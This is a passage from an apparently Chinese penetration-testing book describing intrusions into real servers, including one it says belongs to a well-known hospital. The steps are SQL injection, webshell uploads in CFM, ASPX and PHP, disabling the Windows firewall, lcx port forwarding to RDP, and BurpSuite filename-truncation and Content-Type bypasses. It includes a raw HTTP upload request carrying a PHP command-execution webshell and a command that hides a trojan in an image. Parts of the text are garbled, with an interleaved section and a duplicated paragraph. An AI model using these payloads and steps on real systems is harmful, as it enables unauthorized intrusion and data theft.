1xx.1xx.111.1xx”登錄服務(wù)器，不用輸入遠(yuǎn)程服務(wù)器的密碼也能達(dá)到完美登錄服務(wù)器的目的，如圖6-61所示。6.6.5總結(jié)與思考(1)?Openfire需要獲取管理員賬號(hào)和密碼，目前通殺所有版本。Openfire的最新版本為4.1.5。(2)可以通過(guò)BurpSuite對(duì)admin管理員賬號(hào)進(jìn)行暴力破解。(3)使用Openfire安全加固，可以使用強(qiáng)密碼，同時(shí)嚴(yán)格設(shè)置插件權(quán)限，建議除了必需的插件目錄外，禁用新創(chuàng)建目錄。(4)使用本節(jié)所講的方法，成功獲取國(guó)內(nèi)某著名醫(yī)院網(wǎng)絡(luò)的入口權(quán)限。

第七節(jié)利用CFM上傳漏洞滲透某服務(wù)器6.7.1獲取后臺(tái)權(quán)限1.手工查找和自動(dòng)掃描漏洞2.獲取管理員用戶(hù)名稱(chēng)和密碼雖然獲取的SQL注入漏洞無(wú)法利用pangolin進(jìn)行滲透測(cè)試，但可以使用啊D注入工具對(duì)該注入點(diǎn)進(jìn)行猜測(cè)，如圖6-63所示，獲取該數(shù)據(jù)庫(kù)為“****_nqcontent”，用戶(hù)名稱(chēng)為“nqcontent”，數(shù)據(jù)庫(kù)權(quán)限為“db_owner”，根據(jù)SQL注入的一般步驟順利地獲取了有關(guān)管理員的用戶(hù)名和密碼。3.進(jìn)入后臺(tái)使用獲取的用戶(hù)名和密碼成功登錄系統(tǒng)，如圖6-64所示，通過(guò)查看后臺(tái)的各個(gè)功能模塊，發(fā)現(xiàn)在“AssetManagement”中有上傳(Upload)模塊。6.7.2服務(wù)器提權(quán)1.獲取Webshell通過(guò)測(cè)試了解到該上傳模塊允許上傳CFM以及圖片文件，上傳一個(gè)CFM的命令并執(zhí)行Webshell，如圖6-65所示，上傳后可以成功運(yùn)行，且用戶(hù)權(quán)限較高可以執(zhí)行命令。2.關(guān)閉防火墻通過(guò)停用防火墻(netstopSharedaccess)或添加允許端口來(lái)繞過(guò)防火墻，如圖6-66所示。3.成功登錄3389在本地執(zhí)行命令“l(fā)cx-listen33892008”，將3389端口重定向到本地的2008端口，運(yùn)行mstsc后使用“:2008”進(jìn)行連接，輸入添加的管理員用戶(hù)名和密碼，成功進(jìn)入系統(tǒng)，如圖6-67所示。6.7.3內(nèi)網(wǎng)滲透1.收集服務(wù)器信息通過(guò)查看發(fā)現(xiàn)服務(wù)器還支持PHP，通過(guò)CFM后門(mén)上傳了一個(gè)PHP的Webshell，如圖6-68所示，獲取了該服務(wù)器的配置參數(shù)信息。通過(guò)Webshell獲取了WordPress的數(shù)據(jù)庫(kù)配置信息，再通過(guò)Webshell將WordPress的管理員數(shù)據(jù)庫(kù)導(dǎo)出到本地，如圖6-69所示。2.滲透Mail服務(wù)器6.7.4總結(jié)與思考(1)很多服務(wù)器都部署在虛擬機(jī)上面，滲透成功的也僅僅是虛擬機(jī)，虛擬機(jī)上的業(yè)務(wù)系統(tǒng)遭到破壞后可以快速恢復(fù)。由于硬件的支持，同一個(gè)硬件服務(wù)器可能部署了多個(gè)虛擬應(yīng)用服務(wù)器。(2)針對(duì)CFM的滲透完全可以先使用Jsky進(jìn)行掃描，找到漏洞后再通過(guò)啊D注入工具來(lái)猜測(cè)數(shù)據(jù)。CFM平臺(tái)的滲透還可以通過(guò)手動(dòng)方式來(lái)判斷和猜測(cè)。(3)?CFM平臺(tái)上傳CFM的Webshell后，其分配的權(quán)限很高，可以快速提權(quán)。(4)在具有一定權(quán)限的情況下可以使用命令“netstopsharedaccess”來(lái)停用Windows自帶的防火墻，進(jìn)而通過(guò)lcx轉(zhuǎn)發(fā)端口來(lái)登錄被滲透的內(nèi)網(wǎng)服務(wù)器。

第八節(jié)通過(guò)修改IWMS后臺(tái)系統(tǒng)6.8.1修改上傳設(shè)置IWMS4.6未對(duì)文件上傳類(lèi)型進(jìn)行限制，用戶(hù)可以自定義上傳類(lèi)型。在系統(tǒng)設(shè)置中添加可上傳文件類(lèi)型aspx和asp，如圖6-71所示。6.8.2獲取Webshell1.測(cè)試上傳單擊“新聞管理”→“添加新聞”，在添加新聞頁(yè)面中單擊添加媒體，如圖6-72所示，系統(tǒng)會(huì)自動(dòng)出現(xiàn)上傳功能。2.獲取上傳文件名稱(chēng)和路徑如果上傳成功，系統(tǒng)會(huì)自動(dòng)給出文件上傳的具體路徑，如圖6-74所示，本次上傳的具體路徑為“upload/2011_07/temp_11071410205449.aspx”。6.3.2漏洞分析及利用1.分析網(wǎng)站源代碼(1)通過(guò)查看網(wǎng)站使用的模板以及樣式表等特征信息，判斷該網(wǎng)站使用了SouthidcEditor，并通過(guò)掃描獲取了其詳細(xì)的編輯器地址。(2)下載其默認(rèn)的mdb數(shù)據(jù)庫(kù)，并對(duì)其密碼進(jìn)行破解，獲取其賬號(hào)對(duì)應(yīng)的密碼，使用該密碼進(jìn)行登錄，成功進(jìn)入后臺(tái)，如圖6-23所示。3.獲取Webshell在本例中上傳的是aspx類(lèi)型的一句話(huà)木馬后門(mén)文件，使用中國(guó)菜刀打開(kāi)該Webshell，如圖6-76所示，可以很方便地對(duì)該網(wǎng)站進(jìn)行各種文件操作等。4.上傳大馬進(jìn)行管理使用一句話(huà)后門(mén)比較隱蔽，但操作起來(lái)不如大馬方便，因此上傳大馬進(jìn)行管理，如圖6-77所示。6.8.3總結(jié)與思考(1)?IWMS4.6以下版本均存在本節(jié)所提到的問(wèn)題，通過(guò)修改上傳類(lèi)型可以順利地獲取Webshell。(2)文件上傳獲取Webshell的前提條件是獲取管理員的密碼，估計(jì)是因?yàn)檫@個(gè)原因?qū)е鹿俜揭恢蔽醋餍扪a(bǔ)。

第九節(jié)

使用BurpSuite抓包上傳Webshel6.9.1環(huán)境準(zhǔn)備(1)安裝Java環(huán)境。(2)安裝BurpSuite工具。6.9.2設(shè)置BurpSuite雙擊burpsuite.jar即可運(yùn)行，首次運(yùn)行時(shí)需要設(shè)置項(xiàng)目(project)，使用默認(rèn)設(shè)置，單擊“Next”→“StartBurp”運(yùn)行BurpSuite主界面。1.設(shè)置Proxy在BurpSuite主界面中單擊“Proxy”→“Options”，其中Interface默認(rèn)為:8080，如圖6-78所示。如果地址及端口已經(jīng)存在，則不用設(shè)置，否則需要添加綁定端口Cinterface和地址。1.設(shè)置Proxy在BurpSuite主界面中單擊“Proxy”→“Options”，其中Interface默認(rèn)為:8080，如圖6-78所示。如果地址及端口已經(jīng)存在，則不用設(shè)置，否則需要添加綁定端口Cinterface和地址。2.設(shè)置代理(以IE為例)在瀏覽器中單擊“工具”→“Internet選項(xiàng)”→“連接”→“局域網(wǎng)設(shè)置”，在代理服務(wù)器中填寫(xiě)地址，端口8080，如圖6-79所示。6.9.3抓包并修改包文件內(nèi)容1.執(zhí)行文件上傳再次打開(kāi)目標(biāo)網(wǎng)站并進(jìn)入后臺(tái)，找到文件上傳處，單擊”選擇文件“選擇預(yù)先設(shè)置好的圖片(在圖片中插入一句話(huà)木馬，也可以通過(guò)copy/b1.aspx+1.jpgcmd.aspx;.jpg命令合成一張帶一句話(huà)或者Webshell的后門(mén)圖片)，如圖6-80所示，選擇圖片后BurpSuite會(huì)進(jìn)行攔截。2.放行抓包在BurpSuite中單擊”Intercept“，可以看到抓包獲取的信息，其中“Interceptison”表示BurpSuite正在進(jìn)行攔截，單擊“Forward”放行，單擊“Drop”丟棄抓包內(nèi)容。3.修改包內(nèi)容右鍵找到Ctrl?+?R這個(gè)按鈕，單擊來(lái)到Repeater界面，在這個(gè)界面將完成包內(nèi)容的修改工作，把a(bǔ)aa.jpg修改成aaa.asp(后面加上一個(gè)空格)，在Windows中文件名稱(chēng)后的空格將自動(dòng)被忽略掉，如圖6-82所示。4.提交修改包單擊Hex在右側(cè)編碼區(qū)找到aaa.asp這段文字，一個(gè)空格的編碼是(20)，我們修改成(00)然后點(diǎn)擊Go，如果返回一段信息的話(huà)，就代表我們已經(jīng)成功了。如果沒(méi)有返回信息，請(qǐng)重新來(lái)一遍，或者去掉空格，如果不用空格，直接可以點(diǎn)擊Go按鈕發(fā)送，如果返回OK信息則表明修改包成功發(fā)送，如圖6-84所示。6.9.4獲取Webshell提交包到服務(wù)器后，在瀏覽器中會(huì)返回執(zhí)行的結(jié)果，顯示文件上傳成功，通過(guò)查看文件來(lái)獲取上傳文件的地址，如圖6-86所示成功獲取Webshell。6.9.5BurpSuite截?cái)嗌蟼骺偨Y(jié)1.?BurpSuite重命名上傳文件截?cái)嗌蟼鰾urpSuite截?cái)嗌蟼骺梢酝黄艼avaScript本地檢測(cè)，在抓包文件中直接將文件名進(jìn)行替換，例如上傳的文件aaa.jpg是JavaScript驗(yàn)證允許的，直接在BurpSuite中將jpg修改為asp就可以成功繞過(guò)。2.?BurpSuite文件名后空格截?cái)嗌蟼髯グ笤趂ilepath參數(shù)中將aaa.jpg修改為aaa.asp，需要通過(guò)hex將空格“20”改為空字符“00”。截?cái)噙€有一種情況，就是修改文件名為aaa.asp□.jpg，但是這種情況比較少見(jiàn)。3.?Content-type類(lèi)型繞過(guò)如果上傳腳本是通過(guò)檢測(cè)的Content-type類(lèi)型，原為Content-Type:text/plain，將文件類(lèi)型修改為image/gif即可繞過(guò)，代碼如下：<?phpif($_FILES['userfile']['type']!="image/gif"){ //檢測(cè)Content-typeecho"Sorry,weonlyallowuploadingGIFimages";exit;}$uploaddir='uploads/';$uploadfile=$uploaddir.basename($_FILES['userfile']['name']);

if(move_uploaded_file($_FILES['userfile']['tmp_name'],$uploadfile)){echo"Fileisvalid,andwassuccessfullyuploaded.\n";}else{echo"Fileuploadingfailed.\n";}?>可以在BurpSite中將Request包的Content-Type進(jìn)行修改。POST/upload.phpHTTP/1.1TE:deflate,gzip;q=0.3Connection:TE,closeHost:localhostUser-Agent:libwww-perl/5.803Content-Type:multipart/form-data;boundary=xYzZYContent-Length:155--xYzZYContent-Disposition:form-data;name="userfile";filename="shell.php"Content-Type:image/gif(原為Content-Type:text/plain，此處修改為image/gif即可繞過(guò))<?phpsystem($_GET['command']);?>--xYzZY--

第十節(jié)密碼繞過(guò)獲取某站點(diǎn)Webshell6.10